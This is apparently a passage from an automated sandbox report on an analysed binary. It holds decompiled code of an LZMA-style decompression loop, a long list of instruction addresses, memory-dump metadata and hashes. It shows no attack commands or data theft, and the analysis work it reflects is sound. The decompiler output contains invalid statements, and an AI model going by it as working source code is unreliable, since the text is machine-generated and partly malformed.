											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                            0x00000000
                                            0x0040680a
                                            0x0040680a
                                            0x0040680e
                                            0x00406833
                                            0x0040683d
                                            0x00000000
                                            0x00406810
                                            0x00406810
                                            0x00406813
                                            0x00406817
                                            0x0040681a
                                            0x0040681d
                                            0x00406821
                                            0x00406821
                                            0x00406824
                                            0x004068fe
                                            0x004068fe
                                            0x00406905
                                            0x00406905
                                            0x00406908
                                            0x0040690f
                                            0x0040693c
                                            0x00406940
                                            0x004069a0
                                            0x004069a3
                                            0x004069a8
                                            0x004069a9
                                            0x004069ab
                                            0x004069ad
                                            0x004069b0
                                            0x004068bc
                                            0x004068bc
                                            0x004068bc
                                            0x00406058
                                            0x00406058
                                            0x00406058
                                            0x00406061
                                            0x00000000
                                            0x00000000
                                            0x00406067
                                            0x00000000
                                            0x00406072
                                            0x00000000
                                            0x00000000
                                            0x0040607b
                                            0x0040607e
                                            0x00406081
                                            0x00406085
                                            0x00000000
                                            0x00000000
                                            0x0040608b
                                            0x0040608e
                                            0x00406090
                                            0x00406091
                                            0x00406094
                                            0x00406096
                                            0x00406097
                                            0x00406099
                                            0x0040609c
                                            0x004060a1
                                            0x004060a6
                                            0x004060af
                                            0x004060c2
                                            0x004060c5
                                            0x004060d1
                                            0x004060f9
                                            0x004060fb
                                            0x00406109
                                            0x00406109
                                            0x0040610d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004060fd
                                            0x004060fd
                                            0x00406100
                                            0x00406101
                                            0x00406101
                                            0x00000000
                                            0x004060fd
                                            0x004060d7
                                            0x004060dc
                                            0x004060dc
                                            0x004060e5
                                            0x004060ed
                                            0x004060f0
                                            0x00000000
                                            0x004060f6
                                            0x004060f6
                                            0x00000000
                                            0x004060f6
                                            0x00000000
                                            0x00406113
                                            0x00406113
                                            0x00406117
                                            0x004069c3
                                            0x00000000
                                            0x004069c3
                                            0x00406120
                                            0x00406130
                                            0x00406133
                                            0x00406136
                                            0x00406136
                                            0x00406136
                                            0x00406139
                                            0x0040613d
                                            0x00000000
                                            0x00000000
                                            0x0040613f
                                            0x00406145
                                            0x0040616f
                                            0x00406175
                                            0x0040617c
                                            0x00000000
                                            0x0040617c
                                            0x0040614b
                                            0x0040614e
                                            0x00406153
                                            0x00406153
                                            0x0040615e
                                            0x00406166
                                            0x00406169
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004061ae
                                            0x004061b4
                                            0x004061b7
                                            0x004061c4
                                            0x004061cc
                                            0x00000000
                                            0x00000000
                                            0x00406183
                                            0x00406183
                                            0x00406187
                                            0x004069d2
                                            0x00000000
                                            0x004069d2
                                            0x00406193
                                            0x0040619e
                                            0x0040619e
                                            0x0040619e
                                            0x004061a1
                                            0x004061a4
                                            0x004061a7
                                            0x004061ac
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406843
                                            0x00406843
                                            0x00406849
                                            0x0040684f
                                            0x00406855
                                            0x0040686f
                                            0x00406872
                                            0x00406878
                                            0x00406883
                                            0x00406883
                                            0x00406885
                                            0x00406857
                                            0x00406857
                                            0x00406866
                                            0x0040686a
                                            0x0040686a
                                            0x0040688f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406891
                                            0x00406895
                                            0x00406a44
                                            0x00000000
                                            0x00406a44
                                            0x004068a1
                                            0x004068a8
                                            0x004068b0
                                            0x004068b3
                                            0x004068b6
                                            0x004068b6
                                            0x00000000
                                            0x00000000
                                            0x004061d4
                                            0x004061d6
                                            0x004061d9
                                            0x0040624a
                                            0x0040624d
                                            0x00406250
                                            0x00406257
                                            0x00406261
                                            0x00000000
                                            0x00406261
                                            0x004061db
                                            0x004061df
                                            0x004061e2
                                            0x004061e4
                                            0x004061e7
                                            0x004061ea
                                            0x004061ec
                                            0x004061ef
                                            0x004061f1
                                            0x004061f6
                                            0x004061f9
                                            0x004061fc
                                            0x00406200
                                            0x00406207
                                            0x0040620a
                                            0x00406211
                                            0x00406215
                                            0x0040621d
                                            0x0040621d
                                            0x0040621d
                                            0x00406217
                                            0x00406217
                                            0x00406217
                                            0x0040620c
                                            0x0040620c
                                            0x0040620c
                                            0x00406221
                                            0x00406224
                                            0x00406242
                                            0x00406244
                                            0x00000000
                                            0x00406226
                                            0x00406226
                                            0x00406229
                                            0x0040622c
                                            0x0040622f
                                            0x00406231
                                            0x00406231
                                            0x00406231
                                            0x00406234
                                            0x00406237
                                            0x00406239
                                            0x0040623a
                                            0x0040623d
                                            0x00000000
                                            0x0040623d
                                            0x00000000
                                            0x00406473
                                            0x00406477
                                            0x00406495
                                            0x00406498
                                            0x0040649f
                                            0x004064a2
                                            0x004064a5
                                            0x004064a8
                                            0x004064ab
                                            0x004064ae
                                            0x004064b0
                                            0x004064b7
                                            0x004064b8
                                            0x004064ba
                                            0x004064bd
                                            0x004064c0
                                            0x004064c3
                                            0x004064c3
                                            0x004064c8
                                            0x00000000
                                            0x004064c8
                                            0x00406479
                                            0x0040647c
                                            0x0040647f
                                            0x00406489
                                            0x00000000
                                            0x00000000
                                            0x004064dd
                                            0x004064e1
                                            0x00406504
                                            0x00406507
                                            0x0040650a
                                            0x00406514
                                            0x004064e3
                                            0x004064e3
                                            0x004064e6
                                            0x004064e9
                                            0x004064ec
                                            0x004064f9
                                            0x004064fc
                                            0x004064fc
                                            0x00000000
                                            0x00000000
                                            0x00406520
                                            0x00406524
                                            0x00000000
                                            0x00000000
                                            0x0040652a
                                            0x0040652e
                                            0x00000000
                                            0x00000000
                                            0x00406534
                                            0x00406536
                                            0x0040653a
                                            0x0040653a
                                            0x0040653d
                                            0x00406541
                                            0x00000000
                                            0x00000000
                                            0x00406591
                                            0x00406595
                                            0x0040659c
                                            0x0040659f
                                            0x004065a2
                                            0x004065ac
                                            0x00000000
                                            0x004065ac
                                            0x00406597
                                            0x00000000
                                            0x00000000
                                            0x004065b8
                                            0x004065bc
                                            0x004065c3
                                            0x004065c6
                                            0x004065c9
                                            0x004065be
                                            0x004065be
                                            0x004065be
                                            0x004065cc
                                            0x004065cf
                                            0x004065d2
                                            0x004065d2
                                            0x004065d5
                                            0x004065d8
                                            0x004065db
                                            0x004065db
                                            0x004065de
                                            0x004065e5
                                            0x004065ea
                                            0x00000000
                                            0x00000000
                                            0x00406678
                                            0x00406678
                                            0x0040667c
                                            0x00406a1a
                                            0x00000000
                                            0x00406a1a
                                            0x00406682
                                            0x00406685
                                            0x00406688
                                            0x0040668c
                                            0x0040668f
                                            0x00406695
                                            0x00406697
                                            0x00406697
                                            0x00406697
                                            0x0040669a
                                            0x0040669d
                                            0x00000000
                                            0x00000000
                                            0x0040626d
                                            0x0040626d
                                            0x00406271
                                            0x004069de
                                            0x00000000
                                            0x004069de
                                            0x00406277
                                            0x0040627a
                                            0x0040627d
                                            0x00406281
                                            0x00406284
                                            0x0040628a
                                            0x0040628c
                                            0x0040628c
                                            0x0040628c
                                            0x0040628f
                                            0x00406292
                                            0x00406292
                                            0x00406295
                                            0x00406298
                                            0x00000000
                                            0x00000000
                                            0x0040629e
                                            0x004062a4
                                            0x00000000
                                            0x00000000
                                            0x004062aa
                                            0x004062aa
                                            0x004062ae
                                            0x004062b1
                                            0x004062b4
                                            0x004062b7
                                            0x004062ba
                                            0x004062bb
                                            0x004062be
                                            0x004062c0
                                            0x004062c6
                                            0x004062c9
                                            0x004062cc
                                            0x004062cf
                                            0x004062d2
                                            0x004062d5
                                            0x004062d8
                                            0x004062f4
                                            0x004062f7
                                            0x004062fa
                                            0x004062fd
                                            0x00406304
                                            0x00406308
                                            0x0040630a
                                            0x0040630e
                                            0x004062da
                                            0x004062da
                                            0x004062de
                                            0x004062e6
                                            0x004062eb
                                            0x004062ed
                                            0x004062ef
                                            0x004062ef
                                            0x00406311
                                            0x00406318
                                            0x0040631b
                                            0x00000000
                                            0x00406321
                                            0x00000000
                                            0x00406321
                                            0x00000000
                                            0x00406326
                                            0x00406326
                                            0x0040632a
                                            0x004069ea
                                            0x00000000
                                            0x004069ea
                                            0x00406330
                                            0x00406333
                                            0x00406336
                                            0x0040633a
                                            0x0040633d
                                            0x00406343
                                            0x00406345
                                            0x00406345
                                            0x00406345
                                            0x00406348
                                            0x0040634b
                                            0x0040634b
                                            0x0040634b
                                            0x00406351
                                            0x00000000
                                            0x00000000
                                            0x00406353
                                            0x00406356
                                            0x00406359
                                            0x0040635c
                                            0x0040635f
                                            0x00406362
                                            0x00406365
                                            0x00406368
                                            0x0040636b
                                            0x0040636e
                                            0x00406371
                                            0x00406389
                                            0x0040638c
                                            0x0040638f
                                            0x00406392
                                            0x00406392
                                            0x00406395
                                            0x00406399
                                            0x0040639b
                                            0x00406373
                                            0x00406373
                                            0x0040637b
                                            0x00406380
                                            0x00406382
                                            0x00406384
                                            0x00406384
                                            0x0040639e
                                            0x004063a5
                                            0x004063a8
                                            0x00000000
                                            0x004063aa
                                            0x00000000
                                            0x004063aa
                                            0x004063a8
                                            0x004063af
                                            0x004063af
                                            0x004063af
                                            0x004063af
                                            0x00000000
                                            0x00000000
                                            0x004063ea
                                            0x004063ea
                                            0x004063ee
                                            0x004069f6
                                            0x00000000
                                            0x004069f6
                                            0x004063f4
                                            0x004063f7
                                            0x004063fa
                                            0x004063fe
                                            0x00406401
                                            0x00406407
                                            0x00406409
                                            0x00406409
                                            0x00406409
                                            0x0040640c
                                            0x0040640f
                                            0x0040640f
                                            0x00406415
                                            0x004063b3
                                            0x004063b3
                                            0x004063b6
                                            0x00000000
                                            0x004063b6
                                            0x00406417
                                            0x00406417
                                            0x0040641a
                                            0x0040641d
                                            0x00406420
                                            0x00406423
                                            0x00406426
                                            0x00406429
                                            0x0040642c
                                            0x0040642f
                                            0x00406432
                                            0x00406435
                                            0x0040644d
                                            0x00406450
                                            0x00406453
                                            0x00406456
                                            0x00406456
                                            0x00406459
                                            0x0040645d
                                            0x0040645f
                                            0x00406437
                                            0x00406437
                                            0x0040643f
                                            0x00406444
                                            0x00406446
                                            0x00406448
                                            0x00406448
                                            0x00406462
                                            0x00406469
                                            0x0040646c
                                            0x00000000
                                            0x0040646e
                                            0x00000000
                                            0x0040646e
                                            0x00000000
                                            0x004066fb
                                            0x004066fb
                                            0x004066ff
                                            0x00406a26
                                            0x00000000
                                            0x00406a26
                                            0x00406705
                                            0x00406708
                                            0x0040670b
                                            0x0040670f
                                            0x00406712
                                            0x00406718
                                            0x0040671a
                                            0x0040671a
                                            0x0040671a
                                            0x0040671d
                                            0x00000000
                                            0x00000000
                                            0x004064cb
                                            0x004064cb
                                            0x004064ce
                                            0x00406840
                                            0x00406840
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004068c7
                                            0x004068cb
                                            0x004068e9
                                            0x004068e9
                                            0x004068e9
                                            0x004068f0
                                            0x004068f7
                                            0x00000000
                                            0x004068f7
                                            0x004068cd
                                            0x004068d0
                                            0x004068d3
                                            0x004068d6
                                            0x004068dd
                                            0x00000000
                                            0x00000000
                                            0x004069b8
                                            0x004069bb
                                            0x004068bc
                                            0x004068bc
                                            0x00000000
                                            0x00000000
                                            0x004065f2
                                            0x004065f4
                                            0x004065fb
                                            0x004065fc
                                            0x004065fe
                                            0x00406601
                                            0x00000000
                                            0x00000000
                                            0x00406609
                                            0x0040660c
                                            0x0040660f
                                            0x00406611
                                            0x00406613
                                            0x00406613
                                            0x00406614
                                            0x00406617
                                            0x0040661e
                                            0x00406621
                                            0x0040662f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406914
                                            0x00406914
                                            0x00406918
                                            0x00406a50
                                            0x00000000
                                            0x00406a50
                                            0x0040691e
                                            0x00406921
                                            0x00406924
                                            0x00406928
                                            0x0040692b
                                            0x00406931
                                            0x00406933
                                            0x00406933
                                            0x00406933
                                            0x00406936
                                            0x00406939
                                            0x00406939
                                            0x00406939
                                            0x00406939
                                            0x00000000
                                            0x00000000
                                            0x00406637
                                            0x0040663a
                                            0x00406670
                                            0x004067a0
                                            0x004067a0
                                            0x004067a0
                                            0x004067a0
                                            0x004067a3
                                            0x004067a3
                                            0x004067a6
                                            0x004067a8
                                            0x00406a32
                                            0x00000000
                                            0x00406a32
                                            0x004067ae
                                            0x004067b1
                                            0x00000000
                                            0x00000000
                                            0x004067b7
                                            0x004067bb
                                            0x004067be
                                            0x004067be
                                            0x004067be
                                            0x00000000
                                            0x004067be
                                            0x0040663c
                                            0x0040663e
                                            0x00406640
                                            0x00406642
                                            0x00406645
                                            0x00406646
                                            0x00406648
                                            0x0040664a
                                            0x0040664d
                                            0x00406650
                                            0x00406666
                                            0x0040666b
                                            0x004066a3
                                            0x004066a3
                                            0x004066a7
                                            0x004066d3
                                            0x004066d5
                                            0x004066dc
                                            0x004066df
                                            0x004066e2
                                            0x004066e2
                                            0x004066e7
                                            0x004066e7
                                            0x004066e9
                                            0x004066ec
                                            0x004066f3
                                            0x004066f6
                                            0x00406723
                                            0x00406723
                                            0x00406726
                                            0x00406729
                                            0x0040679d
                                            0x0040679d
                                            0x0040679d
                                            0x00000000
                                            0x0040679d
                                            0x0040672b
                                            0x00406731
                                            0x00406734
                                            0x00406737
                                            0x0040673a
                                            0x0040673d
                                            0x00406740
                                            0x00406743
                                            0x00406746
                                            0x00406749
                                            0x0040674c
                                            0x00406765
                                            0x00406767
                                            0x0040676a
                                            0x0040676b
                                            0x0040676e
                                            0x00406770
                                            0x00406773
                                            0x00406775
                                            0x00406777
                                            0x0040677a
                                            0x0040677c
                                            0x0040677f
                                            0x00406783
                                            0x00406785
                                            0x00406785
                                            0x00406786
                                            0x00406789
                                            0x0040678c
                                            0x0040674e
                                            0x0040674e
                                            0x00406756
                                            0x0040675b
                                            0x0040675d
                                            0x00406760
                                            0x00406760
                                            0x0040678f
                                            0x00406796
                                            0x00406720
                                            0x00406720
                                            0x00406720
                                            0x00406720
                                            0x00000000
                                            0x00406798
                                            0x00000000
                                            0x00406798
                                            0x00406796
                                            0x004066a9
                                            0x004066ac
                                            0x004066ae
                                            0x004066b1
                                            0x004066b4
                                            0x004066b7
                                            0x004066b9
                                            0x004066bc
                                            0x004066bf
                                            0x004066bf
                                            0x004066c2
                                            0x004066c2
                                            0x004066c5
                                            0x004066cc
                                            0x004066a0
                                            0x004066a0
                                            0x004066a0
                                            0x004066a0
                                            0x00000000
                                            0x004066ce
                                            0x00000000
                                            0x004066ce
                                            0x004066cc
                                            0x00406652
                                            0x00406655
                                            0x00406657
                                            0x0040665a
                                            0x00000000
                                            0x00000000
                                            0x004063b9
                                            0x004063b9
                                            0x004063bd
                                            0x00406a02
                                            0x00000000
                                            0x00406a02
                                            0x004063c3
                                            0x004063c6
                                            0x004063c9
                                            0x004063cc
                                            0x004063cf
                                            0x004063d2
                                            0x004063d5
                                            0x004063d7
                                            0x004063da
                                            0x004063dd
                                            0x004063e0
                                            0x004063e2
                                            0x004063e2
                                            0x004063e2
                                            0x00000000
                                            0x00000000
                                            0x00406544
                                            0x00406544
                                            0x00406548
                                            0x00406a0e
                                            0x00000000
                                            0x00406a0e
                                            0x0040654e
                                            0x00406551
                                            0x00406554
                                            0x00406557
                                            0x00406559
                                            0x00406559
                                            0x00406559
                                            0x0040655c
                                            0x0040655f
                                            0x00406562
                                            0x00406565
                                            0x00406568
                                            0x0040656b
                                            0x0040656c
                                            0x0040656e
                                            0x0040656e
                                            0x0040656e
                                            0x00406571
                                            0x00406574
                                            0x00406577
                                            0x0040657a
                                            0x0040657a
                                            0x0040657a
                                            0x0040657d
                                            0x0040657f
                                            0x0040657f
                                            0x00000000
                                            0x00000000
                                            0x004067c1
                                            0x004067c1
                                            0x004067c1
                                            0x004067c5
                                            0x00000000
                                            0x00000000
                                            0x004067cb
                                            0x004067ce
                                            0x004067d1
                                            0x004067d4
                                            0x004067d6
                                            0x004067d6
                                            0x004067d6
                                            0x004067d9
                                            0x004067dc
                                            0x004067df
                                            0x004067e2
                                            0x004067e5
                                            0x004067e8
                                            0x004067e9
                                            0x004067eb
                                            0x004067eb
                                            0x004067eb
                                            0x004067ee
                                            0x004067f1
                                            0x004067f4
                                            0x004067f7
                                            0x004067fa
                                            0x004067fe
                                            0x00406800
                                            0x00406803
                                            0x00000000
                                            0x00406805
                                            0x00406582
                                            0x00406582
                                            0x00000000
                                            0x00406582
                                            0x00406803
                                            0x00406a38
                                            0x00406a5a
                                            0x00406a60
                                            0x00406a62
                                            0x00406a69
                                            0x00406a6b
                                            0x00406a72
                                            0x00406a76
                                            0x00000000
                                            0x00406067
                                            0x00406a6f
                                            0x00406a6f
                                            0x00000000
                                            0x00406a6f
                                            0x004068bc
                                            0x00406942
                                            0x00406948
                                            0x0040694b
                                            0x0040694e
                                            0x00406951
                                            0x00406954
                                            0x00406957
                                            0x0040695a
                                            0x0040695d
                                            0x00406963
                                            0x0040697c
                                            0x0040697f
                                            0x00406982
                                            0x00406985
                                            0x00406989
                                            0x0040698b
                                            0x0040698c
                                            0x0040698f
                                            0x00406965
                                            0x00406965
                                            0x0040696d
                                            0x00406972
                                            0x00406974
                                            0x00406977
                                            0x00406977
                                            0x00406999
                                            0x00000000
                                            0x0040699b
                                            0x00000000
                                            0x0040699b
                                            0x00406999
                                            0x00000000
                                            0x0040680e

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b90b51789b68cdbba6ca9369e5ad938c532d61a1d7775d6d72ffdff9632d9f26
                                            • Instruction ID: c9a91825e94b1235ed1e5db661991067e3a312009d26920905f6c04b87fbb156
                                            • Opcode Fuzzy Hash: b90b51789b68cdbba6ca9369e5ad938c532d61a1d7775d6d72ffdff9632d9f26
                                            • Instruction Fuzzy Hash: 25913F71E00228CFDF28DFA8C8547ADBBB1FB44305F15816AD916BB291C3789A96DF44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00406520, Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 98%
                                            			E00406520() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
